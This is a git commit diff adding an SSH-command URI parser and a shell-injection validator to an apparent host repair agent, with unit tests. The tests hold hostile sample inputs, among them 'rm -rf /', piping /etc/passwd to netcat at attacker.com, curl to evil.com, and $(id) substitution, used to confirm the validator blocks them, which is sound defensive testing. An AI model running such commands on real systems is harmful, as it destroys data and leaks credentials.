feat(api): URI scheme 解析器 + Shell Injection 防護 (Sprint 3 T1)

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
This commit is contained in:
OG T
2026-04-06 14:18:21 +08:00
parent 9197994d51
commit 5e8b2a6894
2 changed files with 135 additions and 0 deletions

View File

@@ -35,6 +35,61 @@ _COMPONENT_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,30}$")
SSH_TIMEOUT = 60 # seconds
# =============================================================================
# URI Scheme 解析
# 2026-04-06 Claude Code: Sprint 3 T1
# =============================================================================
@dataclass
class SshCommandURI:
"""解析後的 SSH_COMMAND URI"""
scheme: str # "openclaw" | "ansible" | "ssh"
host_or_layer: str # "docker-110" | "192.168.0.188" | "wooo@192.168.0.110"
payload: str # component name | playbook filename | raw command
_SUPPORTED_SCHEMES = {"openclaw", "ansible", "ssh"}
_SHELL_METACHAR_RE = re.compile(r'[;&|`&]|\$\(')
_MAX_COMMAND_LEN = 512
def parse_uri_command(command: str) -> SshCommandURI:
"""
解析 SSH_COMMAND URI scheme。
支援格式:
openclaw://docker-110/sentry
ansible://192.168.0.188/vacuum_postgres.yml
ssh://wooo@192.168.0.110/docker ps
Raises:
ValueError: scheme 不支援或 payload 為空
"""
if "://" not in command:
raise ValueError(f"Unsupported scheme: '{command}' (expected scheme://host/payload)")
scheme, rest = command.split("://", 1)
if scheme not in _SUPPORTED_SCHEMES:
raise ValueError(f"Unsupported scheme: '{scheme}' (supported: {_SUPPORTED_SCHEMES})")
if "/" not in rest:
raise ValueError(f"Invalid URI '{command}': missing payload after host")
host_or_layer, payload = rest.split("/", 1)
if not payload:
raise ValueError(f"Invalid URI '{command}': payload is empty")
return SshCommandURI(scheme=scheme, host_or_layer=host_or_layer, payload=payload)
def validate_shell_safety(command: str) -> None:
"""
驗證 ssh:// payload 不含 shell metacharacter 或超長命令。
Raises:
ValueError: 含危險字元或超過長度限制
"""
if len(command) > _MAX_COMMAND_LEN:
raise ValueError(f"Command too long: {len(command)} > {_MAX_COMMAND_LEN}")
if _SHELL_METACHAR_RE.search(command):
raise ValueError(f"Shell metacharacter detected in command: '{command}'")
@dataclass
class HostRepairResult:

View File

@@ -2,6 +2,7 @@
tests/test_host_repair_agent.py
Host Repair Agent 單元測試
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
"""
import asyncio
import pytest
@@ -129,3 +130,82 @@ class TestHostRepairAgent:
result = await agent.repair(layer="docker-110", component="badcomponent")
assert result.success is False
# =============================================================================
# 測試 URI Scheme 解析
# 2026-04-06 Claude Code: Sprint 3 T1
# =============================================================================
class TestParseUriCommand:
def test_openclaw_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("openclaw://docker-110/sentry")
assert result.scheme == "openclaw"
assert result.host_or_layer == "docker-110"
assert result.payload == "sentry"
def test_ansible_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
assert result.scheme == "ansible"
assert result.host_or_layer == "192.168.0.188"
assert result.payload == "vacuum_postgres.yml"
def test_ssh_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
assert result.scheme == "ssh"
assert result.host_or_layer == "wooo@192.168.0.110"
assert result.payload == "docker ps"
def test_invalid_scheme_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="Unsupported scheme"):
parse_uri_command("http://example.com/cmd")
def test_missing_payload_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="payload"):
parse_uri_command("ansible://192.168.0.188/")
def test_legacy_format_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="Unsupported scheme"):
parse_uri_command("docker-110/sentry")
class TestValidateShellSafety:
def test_safe_command_passes(self):
from src.services.host_repair_agent import validate_shell_safety
validate_shell_safety("docker ps") # must not raise
def test_semicolon_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("docker ps; rm -rf /")
def test_pipe_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("cat /etc/passwd | nc attacker.com 9999")
def test_double_ampersand_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("ls && curl http://evil.com")
def test_command_substitution_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo $(id)")
def test_backtick_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo `id`")
def test_too_long_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="too long"):
validate_shell_safety("a" * 513)